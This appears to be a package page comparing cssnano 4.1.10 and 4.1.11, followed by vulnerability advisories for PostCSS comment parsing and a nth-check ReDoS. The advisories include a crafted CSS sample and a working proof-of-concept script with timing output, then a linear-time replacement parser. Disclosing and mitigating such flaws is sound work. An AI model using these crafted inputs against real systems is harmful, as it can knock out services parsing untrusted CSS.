Cssnano is a powerful, modular minifier for CSS code, built upon the PostCSS ecosystem. Versions 4.1.10 and 4.1.11 share the same core functionality, offering developers a robust solution for reducing CSS file sizes and improving website performance. Both versions rely on PostCSS, cosmiconfig, and is-resolvable for core processing and configuration. They also share the 'cssnano-preset-default' dependency, providing a sensible default configuration for minification. Development dependencies like webpack, babel, and related tools remain consistent between the two, suggesting no significant shifts in the development process.
The key difference lies in the release date and a small increase in the unpacked size of the package. Version 4.1.11 was released significantly later, in April 2021, compared to 4.1.10, which was released in February 2019. While the file count remains the same, the unpacked size of version 4.1.11 is slightly larger (29637 bytes vs 29540 bytes). This subtle increase could indicate minor bug fixes, performance enhancements, or updated dependencies within 'cssnano-preset-default' that are not explicitly listed in the top-level 'dependencies'. Developers should consider upgrading to the later version to benefit from any potential improvements and ensure they are using the most up-to-date and reliable version of the library. Always check the changelog and release notes for a comprehensive understanding of the changes.
All vulnerabilities related to version 4.1.11 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being part of a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability of the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be triggered with the following code.
Proof of Concept
    // PoC.js
    var nthCheck = require("nth-check")

    // Grow the whitespace run on each iteration and time how long the
    // parser takes to reject the (invalid) formula.
    for (var i = 1; i <= 50000; i++) {
        var time = Date.now();
        // A valid "2n" prefix, a long run of spaces, then a character the
        // regex cannot match: the two adjacent \s* quantifiers backtrack
        // over every split of the whitespace before the match fails.
        var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
        try {
            nthCheck.parse(attack_str)
        } catch (err) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
        }
    }
The output:
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
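The general mitigation for this class of bug is to replace the ambiguous regex with a hand-written, single-pass scanner that accepts the same grammar. The following is an added example, not nth-check's own code or the fix it shipped; it mirrors the grammar of the vulnerable pattern (^([+-]?\d*n)?\s*(?:([+-]?)\s*(\d+))?$ plus "odd"/"even") and rejects the crafted input from the PoC in linear time.

```javascript
// Added example (not nth-check's own code): single-pass parser for the
// :nth-child formula grammar. Each character is consumed at most once,
// so a long whitespace run cannot cause backtracking. Returns [a, b].
function parseNth(formula) {
  const s = formula.trim().toLowerCase();
  if (s === "even") return [2, 0];
  if (s === "odd") return [2, 1];

  let i = 0;
  const isWs = (c) => c === " " || c === "\t" || c === "\n" || c === "\r" || c === "\f";
  const isDigit = (c) => c >= "0" && c <= "9";
  const skipWs = () => { while (i < s.length && isWs(s[i])) i++; };
  const readSign = () => (s[i] === "+" || s[i] === "-") ? s[i++] : "";
  const readDigits = () => {
    const start = i;
    while (i < s.length && isDigit(s[i])) i++;
    return s.slice(start, i);
  };

  // Optional "a" part: [+-]?\d*n. Scan tentatively; if no "n" follows,
  // rewind so the sign and digits are re-read as the "b" part.
  let a = 0;
  const mark = i;
  const aSign = readSign();
  const aDigits = readDigits();
  if (s[i] === "n") {
    i++;
    a = aDigits === "" ? 1 : parseInt(aDigits, 10);
    if (aSign === "-") a = -a;
  } else {
    i = mark;
  }

  // Optional "b" part: \s*[+-]?\s*\d+, which must reach end of input.
  // Whitespace is skipped once, in one loop, whatever its length.
  skipWs();
  let b = 0;
  if (i < s.length) {
    const bSign = readSign();
    skipWs();
    const bDigits = readDigits();
    if (bDigits === "" || i !== s.length) {
      throw new Error(`n-th rule couldn't be parsed ('${formula}')`);
    }
    b = parseInt(bDigits, 10);
    if (bSign === "-") b = -b;
  }
  return [a, b];
}
```

Feeding it the PoC string ('2n' followed by tens of thousands of spaces and '!') throws immediately, since the whitespace is consumed by a single loop and the trailing '!' fails the digit check once.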